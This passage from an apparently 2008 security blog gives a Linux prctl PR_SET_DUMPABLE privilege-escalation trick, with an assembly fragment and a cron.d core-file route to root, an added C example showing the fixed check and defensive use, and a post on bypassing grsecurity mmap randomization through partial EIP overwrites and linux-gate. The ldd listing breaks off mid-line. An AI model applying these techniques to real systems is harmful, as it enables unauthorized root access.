    mov $4, %ebx     # option = PR_SET_DUMPABLE
    mov $2, %ecx     # arg2 = 2, accepted by the old check
    int $0x80
    ret

It is possible to send a SIGSEGV signal to this process and make it write a core file in a directory where the user doesn't have permissions.

One way to get root is to create a file in cron.d, or to fill a disk when only root is exempt from quota; RoManSoFt and Dreyer used this trick in their exploit, see rs-labs.

I estimate that the Linux kernel has more bad checks like that.
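An added example, not kernel code, that mirrors the corrected check (showing why the unsigned `arg2 < 0` test is dead), keeps the pre-fix bound for comparison, and shows the defensive use of the same flag from a sensitive process; the function names are assumptions.

```c
#include <errno.h>
#ifdef __linux__
#include <sys/prctl.h>
#endif

/* Added example, not kernel code. Mirrors the fixed sys_prctl check:
 * arg2 is unsigned long, so "arg2 < 0" can never be true and the only
 * effective test is the upper bound, lowered by the fix from 2 to 1. */
long validate_dumpable_arg(unsigned long arg2)
{
    if (arg2 > 1)
        return -EINVAL;
    return 0;
}

/* What the pre-fix check accepted, for comparison. */
long validate_dumpable_arg_old(unsigned long arg2)
{
    if (arg2 > 2)
        return -EINVAL;
    return 0;
}

/* Defensive use from a sensitive process: clear the dumpable flag so
 * the process writes no core and cannot be ptraced by other processes
 * of the same uid, then read it back. Returns the value read back, or
 * -1 on error or off Linux. */
int harden_disable_core_dumps(void)
{
#ifdef __linux__
    if (prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) != 0)
        return -1;
    return prctl(PR_GET_DUMPABLE, 0, 0, 0, 0);
#else
    return -1;
#endif
}
```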

Sunday, January 06, 2008

mmap randomization bypass

Nowadays people patch their kernels with grsecurity, and then it is very difficult to exploit their processes remotely.

One of the grsecurity protections is mmap() randomization: now every address allocation is pseudo-randomized.


Now we don't know where the shellcode is; we have to do something else to divert the execution flow to our code.

Well, we know the local shellcode-in-environ trick, but it is not useful with address space layout randomization.

simkin, a friend of the badchecksum team, has seen a way to make relative jumps instead of absolute ones.

If you overwrite only one byte of the saved eip, you are really overwriting the two least significant bytes of the address, which means you can point to nearby code whose contents you know.

I say two LSBs because the null byte terminating the string is written into the second byte when you write the first.

Then you can use pop pop ret or similar tricks to jump to the shellcode without knowing its address.

Well, modern kernels have stack and heap randomization, but there are some problems: linux-gate, the new system call mechanism, is not randomized, and we can use this library to find jump points.

jesus@pwn3d:/$ ldd -d /bin/ls
linux-gate.so.1 => (0xffffe000)
librt.so.1 => /lib/i686/cmov/librt.so.1 (0xb7f65000)
libacl.so.1 => /lib/libacl.so.1 (0xb7f5e000)
libselinux.so.1 => /lib/libselinux.so.1 (0xb7f47000)
libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7dfa000)
libpthread.so.0 => /lib/i686/cmov/libpthread.so.0 (0xb7de2000)
/lib/ld-linux.so.2 (0xb7f85000)
libattr.so.1 => /lib/libattr.so.1 (0xb7dde000)
libdl.so.2 => /lib/i686/cmov/libdl.so.2 (0xb7dda000)
libsepol.so.1 => /lib/libsepol.so.1 (0xb7d99000)
jesus@pwn3d:/$ ldd -d /bin/ls
linux-gate.so.1 => (0xffffe000)
librt.so.1 => /lib/i686/cmov/librt.so.1 (0xb7fbe000)
libacl.so.1 => /lib/libacl.so.1 (0xb7fb7000)
libselinux.so.1 => /lib/libselinux.so.1 (0xb7fa0000)
libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7e53000)
libpthread.so.0 => /lib/i686/cmov/libpthread.so.0 (0xb7e3b000)
/lib/ld-linux.so.2 (0xb7fde000)
libattr.so.1 => /lib/libattr.so.1 (0xb7e37000)
libdl.so.2 => /lib/i686/cmov/libdl.so.2 (0xb7e330


I know that there are other techniques in the wild to bypass PaX protections.